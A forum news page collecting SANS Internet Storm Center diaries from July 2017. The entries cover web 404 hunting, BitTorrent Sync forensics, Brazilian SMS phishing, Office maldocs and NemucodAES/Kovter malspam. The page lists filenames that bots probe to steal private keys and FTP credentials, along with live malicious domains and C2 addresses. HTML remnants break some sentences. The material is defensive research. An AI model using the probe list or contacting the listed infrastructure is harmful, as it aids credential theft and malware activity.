Baanboard.com

Go Back   Baanboard.com > News > RSS Newsfeeds > Categories

User login

Frontpage Sponsor

Main

Poll
For ERP LN feature pack upgrade, what method of install are you using?
Installation Wizard into existing VRC
35%
Installation Wizard into new VRC
42%
Manual into existing VRC
3%
Manual into new VRC
19%
Total votes: 31

Baanboard at LinkedIn


Reference Content

 
Security

ISC Stormcast For Friday, July 21st 2017 https://isc.sans.edu/podcastdetail.html?id=5592, (Fri, Jul 21st)

SANS Internet Storm Center - July 21, 2017 - 1:15am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Thursday, July 20th 2017 https://isc.sans.edu/podcastdetail.html?id=5590, (Thu, Jul 20th)

SANS Internet Storm Center - July 20, 2017 - 1:05am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Bots Searching for Keys & Config Files, (Wed, Jul 19th)

SANS Internet Storm Center - July 19, 2017 - 7:26am

If youdont know our 404project[1], I would definitively recommend having a look at it! The idea is to track HTTP 404 errors returned by your web servers. I like to compare the value of 404 errors found in web sites log files to dropped events in firewall logs. They can have a huge value to detect ongoing attacks or attackers performing some reconnaissance. Reviewing 404 errors is one task from my daily hunting-todo-list but it may quickly become unmanageable if you have a lot of websites or popular ones. The idea is to focus on rare events that could usually pass below the radar. Here is a Splunk query that I padding:5px 10px"> index=web sourcetype=access_combined status=404 | rex field=uri (?new_uri^\/{1}[a-zA-Z0-9_\-\~]+\.\w+$) | cluster showcount=true t=0.6 field=new_uri | table _time, cluster_count, cluster_label, new_uri | sort cluster_count

What does it do?

  • It searches for 404 errors in all the indexed Apache logs (access_combined)
  • It extracts interesting URIs. Im only interested in files from the root directory eg. GET /namedotextension
  • It creates clusters padding:5px 10px"> _time,cluster_count,cluster_label,new_uri 2017-07-18T13:42:15.000+0200,1,9,/xml.log 2017-07-18T13:18:51.000+0200,1,11,/rules.abe 2017-07-18T11:51:57.000+0200,1,17,/tmp2017.do 2017-07-18T11:51:56.000+0200,1,18,/tmp2017.action 2017-07-18T09:16:52.000+0200,1,23,/db_z.php 2017-07-18T07:28:29.000+0200,1,25,/readme.txt 2017-07-18T03:44:07.000+0200,1,27,/sloth_webmaster.php 2017-07-18T02:52:33.000+0200,1,28,/sitemap.xml 2017-07-18T00:10:57.000+0200,1,29,/license.php 2017-07-18T00:00:32.000+0200,1,30,/How_I_Met_Your_Pointer.pdf 2017-07-17T22:57:41.000+0200,1,31,/browserconfig.xml 2017-07-17T20:02:01.000+0200,1,76,/rootshellbe.zip 2017-07-17T20:01:00.000+0200,1,82,/htdocs.zip 2017-07-17T20:00:54.000+0200,1,83,/a.zip 2017-07-17T20:00:51.000+0200,1,84,/wwwroot1.zip 2017-07-17T20:00:50.000+0200,1,85,/wwwroot1.rar 2017-07-17T19:59:34.000+0200,1,98,/rootshell.zip 2017-07-17T19:59:27.000+0200,1,103,/blogrootshellbe.rar 2017-07-17T19:59:18.000+0200,1,104,/rootshellbe.rar

    Many tested files are basically backup files like I already mentioned in a previous diary[2], nothing changed. But yesterday, I found a bot searching for even more interesting files: configuration files from popular tools and website private keys. Indeed, file transfer tools are used by many webmasters to deploy files on web servers and they could theoretically padding:5px 10px"> /filezilla.xml /ws_ftp.ini /winscp.ini /backup.sql /sitename.key /key.pem /myserver.key /privatekey.key /server.key /journal.mdb /ftp.txt /rules.abe

    Each file was searched with a different combination of lower/upper case characters. Note the presence of rules.abe that is used by webmasters to specify specific rules for some web applications[3]. This file could contain references to hidden applications (This is interesting toknow for an attacker).

    So, keep an eye on your 404 errors and happy hunting!

    [1] https://isc.sans.edu/404project/
    [2]https://isc.sans.edu/forums/diary/Backup+Files+Are+Good+but+Can+Be+Evil/21935
    [3] https://noscript.net/abe/web-authors.html

    Xavier Mertens (@xme)
    ISC Handler - Freelance Security Consultant
    PGP Key

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Wednesday, July 19th 2017 https://isc.sans.edu/podcastdetail.html?id=5588, (Wed, Jul 19th)

SANS Internet Storm Center - July 19, 2017 - 1:15am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 4 ? Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts), (Tue, Jul 18th)

SANS Internet Storm Center - July 18, 2017 - 8:39am

[This is fourth guest diary by Dr.Ali Dehghantanha. Previous diaries in the series are:

If you would like to propose a guest diary, please let us know]

Continuing earlier posts on investigation of BitTorrent Sync version 2.0, this post explains remaining artefacts of user activities from Thumbnail Cache, Registry, Prefetch Files, and Link Files.

Thumbnail cache

Analysis of the Windows thumbcache (stored under %AppData%\Local\Microsoft\Windows\Explorer) recovered copies of thumbnail images for the BitTorrent Sync client application and its download site (e.g., BitTorrent Sync logo and image icons), indicative of BitTorrent Sync usage. Examinations of the thumbnail cache from the file synchronisation only revealed copies of thumbnail images for the synced files from the Windows 8.1 and Mac OS VMs. We could discern the thumbnail cache from the folder table field (of the files table) which made reference to BitTorrent Sync see Figure 1) date of a sync file or folder. width:656px" />

Figure 1: Thumbnail information recovered from the index.sqlite database of Mac OS thumbcache folder.

Windows Registry

Analysis of the HKLM hive determined that the BitTorrent Sync installation could be detected from the presence of the HKLM\SOFTWARE\BitTorrent\Sync key, and the installation path could be discerned from the SyncPath subkey. In addition, the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BitTorrent Sync key could provide supporting information for installation such as the display icons path, display name, BitTorrent Sync version installed, installation and uninstaller paths, and other entries of relevance. Similar to any other Windows application, when the BitTorrent Sync client application is started, there are full path reference for the BitTorrent Sync executable file in HKU\SID\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache, indicative of recent BitTorrent Sync usage. Further evidence to indicate the client application usage could be ascertained from the occurrence of BitTorrent Sync: %Program Files%\BitTorrent Sync\BitTorrent Sync.exe, /MINIMIZED entry alongside the last executed time in Software\Microsoft\Windows\CurrentVersion\Run. Another registry key of forensic interest is the Software\Microsoft\Windows\CurrentVersion\Explorer\ComDig32, which keeps track of a list of filename references (e.g., filenames for the executable and synced files) associated with the BitTorrent Sync client application as well as the timestamp information during the last usage. According to Carvey (2014), the CIDSizeMRU (MRU is the abbreviation for Most-Recently-Used) subkey maintains a list of recently used applications, the OpenSaveMRU registry subkey records list of files that have been opened or saved within a Windows shell dialog box, and the LastVisitedMRU subkey is responsible for tracking specific executable files used by an application to open the files documented in the OpenSaveMRU subkey. Other evidence indicating the BitTorrent Sync client application usage includes the presence of entries referencing the link file as well as the last executed time in Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist.

Prefetch files

Examination of the prefetch files located two prefetch files for BitTorrent Sync, namely BITTORRENT_SYNC.EXE.pf and BITTORRENT SYNC.exe.pf. Amongst the information of forensic interest recoverable from these files include the executable path, the number of times the application has been loaded, as well as the last run time which are useful to supplement timeline analysis. However, no prefetch instance was located for the synced files in our experiments. The presence of the prefetch files after uninstallation implies that there will be BitTorrent Sync references remaining in the prefetch files to indicate its use on the client device.

Link files

Link (.lnk) files are shortcut metadata files used by Windows to maintain a list of linked paths relating to a file (commonly the paths where the original files are located), associated timestamps (created, written, and last accessed times), and file sizes (original and modified) which are useful to identify the origin of a file. An inspection of the directory listings located instances of link file for %Program Files (x86)%\BitTorrent Sync\BitTorrent Sync.exe at %Users%\Public\Desktop\BitTorrent Sync.lnk and %Program Data%\Microsoft\Windows\Start Menu\BitTorrent Sync.lnk, and its presence may be indicative of BitTorrent Sync installation.

--
Bojan
@bojanz

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Tuesday, July 18th 2017 https://isc.sans.edu/podcastdetail.html?id=5586, (Tue, Jul 18th)

SANS Internet Storm Center - July 18, 2017 - 1:50am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Monday, July 17th 2017 https://isc.sans.edu/podcastdetail.html?id=5584, (Mon, Jul 17th)

SANS Internet Storm Center - July 17, 2017 - 1:45am
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

SMS Phishing induces victims to photograph its own token card, (Sun, Jul 16th)

SANS Internet Storm Center - July 17, 2017 - 1:16am

Introduction

Today I faced quite an unusual SMS phishing campaign here in Brazil. A friend of mine received a SMS message supposedly sent from his bank asking him to update his registration data through the given URL. Otherwise, he could have his account blocked, as seen in Figure 1.

width:250px" />

Figure 1 SMS message received

Telling you the truth, my friend doesnt have any account on the informed bank and, even so, we know that those kinds of message are hardly ever sent by banks and are, most of the time, related to malware propagation and information stealing. However, instead of discarding the message, we decided to give it a try and the results, as you are going to read in this diary, surprised us. This campaign involves no malware propagation - just creativity in favor of evil.

SMS Phishing analysis

The link in the message aims to take the victim to a fake and very simplistic mobile version of a well-known bank website. First, it asks for the CPF (a kind of social security card number) and a password, as seen in Figure 2.

width:280px" />

Figure 2 Fake bank website asking for CPF and password

It is interesting noting that there is a data input validation. The user must obey to the CPF number composition rules otherwise he can width:580px" />

Figure 3 CPF validation rules

This kind of validation is certainly used to give a bit of legitimacy to the fake website and, perhaps, to do not overload crooks with much data-mining work.

In the next page, the fake website informs that the device used on that connection needs to be authorized, as seen in Figure 4.

width:280px" />

Figure 4 Fake website: user must authorize the device

By clinking on Habilitar Aparelho which means enable device, a new page is shown asking for the victim to inform the 4-digit password, as seen in Figure 5.

width:280px" />

Figure 5 Fake website asking for the 4-digit password

Again, there is a minimum validation to avoid the user trying very simple passwords like 1234 width:580px" />

Figure 6 4-digit password validation width:280px" />

Figure 7 Asking for the token card picture

By clicking on Finalizar Habilitao which means proceed with the device authorization, the victims smartphone will prompt the user to select a picture from its library or take a new one width:280px" />

Figure 8 Taking the token card picture

Once the victim ends up the whole process, including the token card picture, the criminals will have all the information needed to make fraudulent transactions on the compromised bank account and the user is forwarded to the real bank login page.

Final words

Using victims smartphone to take pictures to steal information or, who knows,things, scares me a little bit. I can explain. Earlier this month, reading Bruce Schneiers blog I saw a post entitled Now Its Easier than Ever to Steal Someones Keys [1] which says, The website key.me will make a duplicate key from a digital photo..

While writing this diary, I was reported about similar SMS Phishing campaigns targeting other banks costumers here in Brazil. Stay tuned.

References

[1] https://www.schneier.com/blog/archives/2017/07/now_its_easier_.html

--
Renato Marinho
Morphus Labs | LinkedIn |Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Office maldoc + .lnk, (Sat, Jul 15th)

SANS Internet Storm Center - July 15, 2017 - 9:38pm

Reader nik submitted a malicious document. It width:867px" />

It width:852px" />

And then we can use Woanware width:829px" />

Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

NemucodAES and the malspam that distributes it, (Fri, Jul 14th)

SANS Internet Storm Center - July 14, 2017 - 4:44am

Introduction

During the past two weeks or so, Ive noticed a significant increase in malicious spam (malspam) with attached zip archives disguised as delivery notices from the United Parcel Service (UPS). These zip archives contain JavaScript files designed to download and install NemucodAES ransomware and Kovter malware on a victims Windows computer. My Online Security reported on this recent wave of malspam late last month, and it border-width:2px" />
Shown above: Example of an email from Thursday 2017-07-13.

Malspam with zip archives containing JavaScript files are easy for most organizations to detect. Yesterday, I visited one such organization, where someone showed me several of these messages blocked by mail filters and identified as malware. But most people have more pressing concerns. Investigating blocked emails is pretty low on their list of priorities.

However, this is an ongoing concern, and the Nemucod ransomware currently pushed by this malspam is a new variant called NemucodAES. According to BleepingComputer, different researchers have identified and tracked this new variant. A decryptor for NemucodAES is currently available from Emisoft.

Kovter is an older malware, but its also an ongoing concern. Together, these two pieces of malware could deliver a nasty punch. This diary reviews some emails and traffic from recent malspam pushing Kovter and NemucodAES.

History of Nemucod

Nemucod is a term for text-based script (usually a JavaScript file) that downloads and installs malware. By the last quarter of 2015, the term Nemucod was used by several security vendors to identify JavaScript-based Trojan downloaders. In several cases, Nemucod downloaded and installed ransomware binaries like TeslaCrypt. By March 2016, we started seeing reports of Nemucod ransomware that stopped downloading ransomware binaries in favor of using its own script-based ransomware component.

And now in July 2017, we see the next phase of Nemucod ransomware: NemucodAES. Emisoft states this new variant is written in JavaScript and PHP. It uses AES and RSA to encrypt a victims files.

History of Kovter

In 2013, Kovter acted as police ransomware that waited on a users Windows host waiting for specific types of events to happen. An example? After getting infected with Kovter, if a victim started a file-sharing application, Kovter would generate a popup message stating he or she violated the law. Then the infected host would demand the victim pay a fine.

By 2014, we started seeing Kovter identified as click-fraud malware. Click-fraud is when a person, computer program, or automated script generates network traffic by contacting numerous websites (or the same website numerous times). This simulates people clicking a web page or online advertisement. Advertisers are paid based on how many people click on their ads. Regular websites can charge more for ads based on how many people view the site. border-width:2px" />
Shown above: Example of click-fraud traffic caused by non-Kovter malware in May 2016, filtered in Wireshark.

By 2015, Kovter started hiding in the Windows registry to avoid detection. Kovters persistence in an infected Windows host consists of various elements. The end result? The initial executable deletes itself after infecting the Windows host, and Kovter effectively becomes a fileless infection.

Kovter hasnt changed much since I started documenting it in 2016. Post-infection traffic is remarkably similar from a sample I collected in January 2016 to the one from July 2017 discussed in this diary. I see a lot of post-infection events for Kovter command and control traffic. But I border-width:2px" />
Shown above: border-width:2px" />
Shown above: Kovter post-infection traffic from July 2017 filtered in Wireshark.

Kovter/NemucodAES malspam from July 2017

As mentioned earlier, this malspam has appeared daily during the past two weeks or so. I collected three for this diary:

  • Date/Time: Tuesday 2017-07-11 at 21:39 UTC
  • From: lprpxzt@host1.watutechnology.com
  • Subject: Status of your UPS delivery ID:008850576
  • Attachment: 008850576.zip
  • Date/Time: Wednesday 2017-07-12 at 23:26 UTC
  • From: test@server.profichi.com.ua
  • Subject: Problems with item delivery, n.5268714
  • Attachment: UPS-Package-5268714.zip
  • Date/Time: Thursday 2017-07-13 at 07:18 UTC
  • From: vtjobs@162-144-72-168.webhostbox.net
  • Subject: UPS parcel #08192149 delivery problem
  • Attachment: border-width:2px" />
    Shown above: Example of a malicious zip attachment and extracted .js file.

    Infection traffic

    Network traffic was typical for an infection by one of the .js files. We first see HTTP requests for the NemucodAES JavaScript, followed by requests for various executables. Then we see the post-infection Kovter traffic. NemucodAES doesn border-width:2px" />
    Shown above: border-width:2px" />
    Shown above: border-width:2px" />
    Shown above: Using Sguil, but we can escalate the Kovter alerts and review them individually.

    The infected Windows host

    The infected windows host opened a notification with the decryption instructions. Encrypted files retained their original file names (no added file extensions as we often see with other ransomware). And I found artifacts in the users AppData\Local and AppData\Local\Temp directories. Some of these files are not inherently malicious. A legitimate PHP executable and DLL file were found in user border-width:2px" />
    Shown above: border-width:2px" />
    Shown above: border-width:2px" />
    Shown above: Artifacts from the user border-width:2px" />
    Shown above: Artifacts from a folder in the users AppData\Local directory.

    Indicators of Compromise (IOCs)

    The following IOCs are associated with the emails and infection on Thursday 2017-07-13:

    Attached zip archives:

    Extracted .js files:

    Kovter executable (deletes itself after infection):

    Domains used in the .js files and NemucodAES decryption instructions:

    • anahata2011.ru - GET /counter [followed by long string of characters]
    • b2stomatologia.pl - GET /counter [followed by long string of characters]
    • bandanamedia.com - GET /counter [followed by long string of characters]
    • chatawzieleni.pl - GET /counter [followed by long string of characters]
    • connexion-zen.com - GET /counter [followed by long string of characters]
    • dilaratahincioglu.com - GET /counter [followed by long string of characters]
    • ekokond.ru - GET /counter [followed by long string of characters]
    • emsp.ru - GET /counter [followed by long string of characters]
    • infermierifktmatuziani.org - GET /counter [followed by long string of characters]
    • infosoft.pl - GET /counter [followed by long string of characters]
    • ionios-sa.gr - GET /counter [followed by long string of characters]
    • it.support4u.pl - GET /counter [followed by long string of characters]
    • jesionowa-dental.pl - GET /counter [followed by long string of characters]
    • ongediertebestrijding.midholland.nl - GET /counter [followed by long string of characters]
    • serdcezemli.ru - GET /counter [followed by long string of characters]
    • snw.snellewieken.nl - GET /counter [followed by long string of characters]
    • www.shiashop.com - GET /counter [followed by long string of characters]

    Kovter post-infection traffic:

    • 24.96.108.157 port 80 - 24.96.108.157 - POST /
    • 61.134.39.188 port 80 - 61.134.39.188 - POST /
    • 133.30.115.97 port 80 - 133.30.115.97 - POST /
    • 135.175.22.211 port 80 - 135.175.22.211 - POST /
    • Various IPs over port 80, 443, and 8080 - Encrypted traffic

    Final words

    Traffic and artifacts from this infection can be found here.

    As mentioned earlier, with proper filtering, these emails are easily blocked. With proper network monitoring, traffic from an infection is easily detected. But some of these messages might slip past your filtering, and some people could possibly get infected. With the NemucodAES decryptor, people can recover their files, but I expect this ransomware will continue to evolve.

    Has one of these messages hit your inbox? If so, please share your story in the comments section.

    ---
    Brad Duncan
    brad [at] malware-traffic-analysis.net

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Friday, July 14th 2017 https://isc.sans.edu/podcastdetail.html?id=5582, (Thu, Jul 13th)

SANS Internet Storm Center - July 13, 2017 - 8:50pm
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 ? Physical Memory artefacts), (Thu, Jul 13th)

SANS Internet Storm Center - July 13, 2017 - 11:35am

[This is third guest diary by Dr.Ali Dehghantanha. You can find his first diaryhereand second here. If you would like to propose a guest diary, please let us know]

Continuing my earlier posts on investigation of BitTorrent Sync version 2.0, this post explains remaining artefacts of user activities in physical memory of Windows 8.1, Mac OS X Mavericks 10.9.5, and Ubuntu 14.04.1 LTS related to BitTorrent Sync version 2.0.
Analysis of the running processes using the pslist function of Volatility was able to recover the process name associated with the BitTorrent Sync client application (e.g., BitTorrent Sync.exe for Windows OS, BitTorrent Sync for Linux OS, and BitTorrent Sync Examinations of the network details using the netscan or netstat width:800px" />

Figure 1: An excerpt of BitTorrent Sync network information recovered using the netscan function of Volatility.

Undertaking data carving of the RAM captures and swap files determined that only the images used by the client application and synced files could be recovered. However, a search for the term btsync or bittorrent sync was able to recover the complete text of the log and metadata files of forensic interest (e.g., sync.log, sync.dat, history.dat, and settings.dat) in the RAM in plain text. In cases when the original file has been deleted, a Yarascan search for the text from the remnants could help attribute the remnants to the BitTorrent Sync or other processes of relevance to identify its origin. Figure 2 illustrates an occurrence of history.dat in the memory space of BitTorrent Sync.exe of the Windows 8.1 VM investigated. width:625px" />

Figure 2: Copy of history.dat file recovered from the memory space of BitTorrent Sync.exe.

Username (login email) and password for the Linux client applications web GUI can be detected following the strings username= and nwpwd= in the RAM respectively. These appeared to be remnants from the form input field of the Linux client application an example is shown in Figure 3. In addition, we also located several password hits in the similar fragments containing the login email in the memory space of BitTorrent Sync. width:663px" />

Figure 3: Username and password recovered from the RAM of Ubuntu OS.

The next post will illustrate Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts of BitTorrent v2.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Thursday, July 13th 2017 https://isc.sans.edu/podcastdetail.html?id=5580, (Wed, Jul 12th)

SANS Internet Storm Center - July 12, 2017 - 10:30pm
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Backup Scripts, the FIM of the Poor, (Wed, Jul 12th)

SANS Internet Storm Center - July 12, 2017 - 10:46am

File Integrity Management or FIM is an interesting security control that can help to detect unusual changes in a file system. By example, on a server, they are directories that do not change often. Example with a UNIX environment:

  • Binaries libraries in /usr/lib, /usr/bin, /bin, /sbin, /usr/local/bin, ...
  • Configuration files in /etc
  • Devices files in /dev

Depending on the applications running on the server, we can also expect that static HTML content wont change often. The deployment of a file integrity management solution has always a cost, even if some solutionsareavailable for free like OSSEC[1].

Basically, to perform file integrity checks, the tool of your choice will read all the files from the file system, check if the content changed, then generate an event if the file has been altered. Wait, do we already have tools that do pretty much the same? Backup scripts of course! To perform differential backups, they also have to scan the complete file system for changes. What not use the output generated by those scripts to detect suspiciouschanges?

Plenty of backup scripts for UNIX relies on rsync[2] which is an amazing tool with interestingoptions. The verbosity is extremely modular. Of course, it candisplay the list of all files that have been added to the backup(read: that have been changed) but it can also output the file hashes by reformating the output format with %C padding:5px 10px"> # rsync --checksum --out-format=%n %C ...

Note: this option is not available on all rsync version, check yours.

Based onthis rsync output, you can search for suspicious changes in sensitive directories like /etc (Why did your /etc/passwd change since the last backup?) or lookup the MD5 hashes of altered binaries against VT or any other database of IOCs. Keep this in mind!

[1]http://ossec-docs.readthedocs.io/en/latest/manual/syscheck/
[2]https://rsync.samba.org/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

July's Microsoft Patch Tuesday, (Tue, Jul 11th)

SANS Internet Storm Center - July 12, 2017 - 1:18am

TodaysMicrosoft Patch Tuesdayfixes critical and important flaws that, if exploited, could give an attacker a range of possibilities - from privilege escalation to remote code execution (RCE) - on different Windows OS and Microsoft Office versions.

One that caught my attention was the RCE which affects the Windows Search service [1] and may allow an unauthenticated attacker to take control over the target system through a SMB connection giving him the possibility to install programs, view, change or delete data or create new accounts with full user rights.

According to Microsoft Advisories, most of the vulnerabilities were privately disclosed and there is no exploit available [yet] for the most critical ones. In either case, make sure to proceed with the updates the recent Wannacry and NotPetya outbreaks told us that maintaining critical vulnerabilities on enterprise Microsoft environments is not a healthy policy, especially when it may allow lateral movement.

Ive summarized the flaws that I consider more important on the list below with the associated CVE, CVSS base score and advisory URLs. Before I forget, besides Microsoft vulnerabilities, there is an important Flash Player update [2].

CVE-2017-8590 | Windows CLFS Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory.

In a local attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.

The update addresses the vulnerability by correcting how CLFS handles objects in memory.

Note: The Common Log File System (CLFS) is a high-performance, general-purpose log file subsystem that dedicated client applications can use and multiple clients can share to optimize log access.

CVSS base: 8.8
CVE: CVE-2017-8590
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8590

or create new accounts with full user rights.

To exploit the vulnerability, the attacker could send specially crafted messages to the Windows Search service. An attacker with access to a target computer could exploit this vulnerability to elevate privileges and take control of the computer. Additionally, in an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer.

The security update addresses the vulnerability by correcting how Windows Search handles objects in memory.

CVSS base: 8.1
CVE: CVE-2017-8589
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589

--

CVE-2017-8563 | Windows Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol.

In a remote attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to send malicious traffic to a domain controller. An attacker who successfully exploited this vulnerability could run processes in an elevated context.

The update addresses this vulnerability by incorporating enhancements to authentication protocols designed to mitigate authentication attacks. It revolves around the concept of channel binding information.

CVE: CVE-2017-8563
CVSS base: 7.5
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8563

CVE-2017-8565 | Windows PowerShell Remote Code Execution Vulnerability

A remote code execution vulnerability exists in PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system.

In an attack scenario, an attacker could execute malicious code in a PowerShell remote session.

The update addresses the vulnerability by correcting how PowerShell deserializes user supplied scripts.

CVE: CVE-2017-8565
CVSS base: 7.5
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8565

CVE-2017-8495 | Kerberos SNAME Security Feature Bypass Vulnerability

A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. An attacker who successfully exploited this vulnerability could use it to bypass Extended Protection for Authentication.

To exploit this vulnerability, an attacker would have to be able to launch a man-in-the-middle (MiTM) attack against the traffic passing between a client and the server.

The update addresses this vulnerability by adding integrity protection to the SNAME field.

CVE: CVE-2017-8495
CVSS base: 7.5
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8495

CVE-2017-8588 | WordPad Remote Code Execution Vulnerability

A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files.

Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.

The update addresses the vulnerability by correcting the way that Microsoft WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft WordPad will leverage to resolve the identified issue.

CVE: CVE-2017-8588
CVSS base: 6.7
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8588

CVE-2017-8463 | Windows Explorer Remote Code Execution Vulnerability

A remote code execution vulnerability exists when Windows Explorer improperly handles executable files and shares during rename operations. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of another user. Users not running as administrators would be less affected.

To exploit this vulnerability, an attacker would first share both a folder and malware named with an executable extension, and then trick the user into thinking that the malware was the folder. The attacker could not force the user to open or browse the share but could use email or instant messages to trick them into doing so.

The update addresses the vulnerability by correcting how Windows Explorer handles executable files and shares during rename operations.

CVE: CVE-2017-8463
CVSS base: 6.3
Advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8463

ADV170009 | July Flash Security Update

This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin APSB17-21: CVE-2017-3099, CVE-2017-3080, CVE-2017-3100

Severity: Critical

Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170009

References

[1] https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8589

[2] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170009

--
Renato Marinho
Morphus Labs | LinkedIn |Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Wednesday, July 12th 2017 https://isc.sans.edu/podcastdetail.html?id=5578, (Tue, Jul 11th)

SANS Internet Storm Center - July 11, 2017 - 10:05pm
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Basic Office maldoc analysis, (Mon, Jul 10th)

SANS Internet Storm Center - July 10, 2017 - 11:21pm

Malicious Office documents come in all type of flavors, sometimes very simple: they contain just an embedded file (for example an EXE), without any script or exploit to automatically launch the embedded file. The user is persuaded through social engineering to extract and execute the embedded file.

Analyzing such files in a sandbox will often not reveal the malicious payload, as the sandbox engine needs to recognize and open the embedded file.

Static analysis is simple however. Let width:1267px" />

If you want to practice this type of analysis, its easy to create your own samples: with Word, use command: Insert / Object / Object / Create from file ...

Inserting object like this can result in other types of documents, which I will cover in an upcoming diary.

Didier Stevens
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Tuesday, July 11th 2017 https://isc.sans.edu/podcastdetail.html?id=5576, (Mon, Jul 10th)

SANS Internet Storm Center - July 10, 2017 - 10:00pm
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

ISC Stormcast For Monday, July 10th 2017 https://isc.sans.edu/podcastdetail.html?id=5574, (Sun, Jul 9th)

SANS Internet Storm Center - July 9, 2017 - 9:40pm
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security

Adversary hunting with SOF-ELK, (Sun, Jul 9th)

SANS Internet Storm Center - July 9, 2017 - 6:51am

As we recently celebrated Independence Day in the U.S., Im reminded that we honor what was, of course, an armed conflict. Todays realities, when we think about conflict, are quite different than the days of lining troops up across the field from each other, loading muskets, and flinging balls of lead into the fray.
We live in a world of asymmetrical battles, often conflicts that arent always obvious in purpose and intent, and likely fought on multiple fronts. For one of the best reads on the topic, take the well spent time to read TJ OConnors The Jester Dynamic: A Lesson in Asymmetric Unmanaged Cyber Warfare. If youre reading this post, its possible that your front is that of 1s and 0s, either as a blue team defender, or as a red team attacker. I live in this world every day of my life as a blue teamer at Microsoft, and as a joint forces cyber network operator. We are faced, each day, with overwhelming, excessive amounts of data, of varying quality, where the answers to questions are likely hidden, but available to those who can dig deeply enough.
New platforms continue to emerge to help us in this cause. At Microsoft we have a variety of platforms that make the process easier for us, but no less arduous, to dig through the data, and the commercial sector continues to expand its offerings. For those with limited budgets and resources, but a strong drive for discovery, that have been outstanding offerings as well. Security Onion has been forefront for years, and is under constant development and improvement in the care of Doug Burks.
Another emerging platform, to be discussed here, is SOF-ELK, part of the SANS Forensics community, created bySANS FOR572, Advanced Network Forensics and Analysisauthor and instructor Phil Hagen. Count SOF-ELK in the NFAT family for sure, a strong player in the Network Forensic Analysis Tool category.
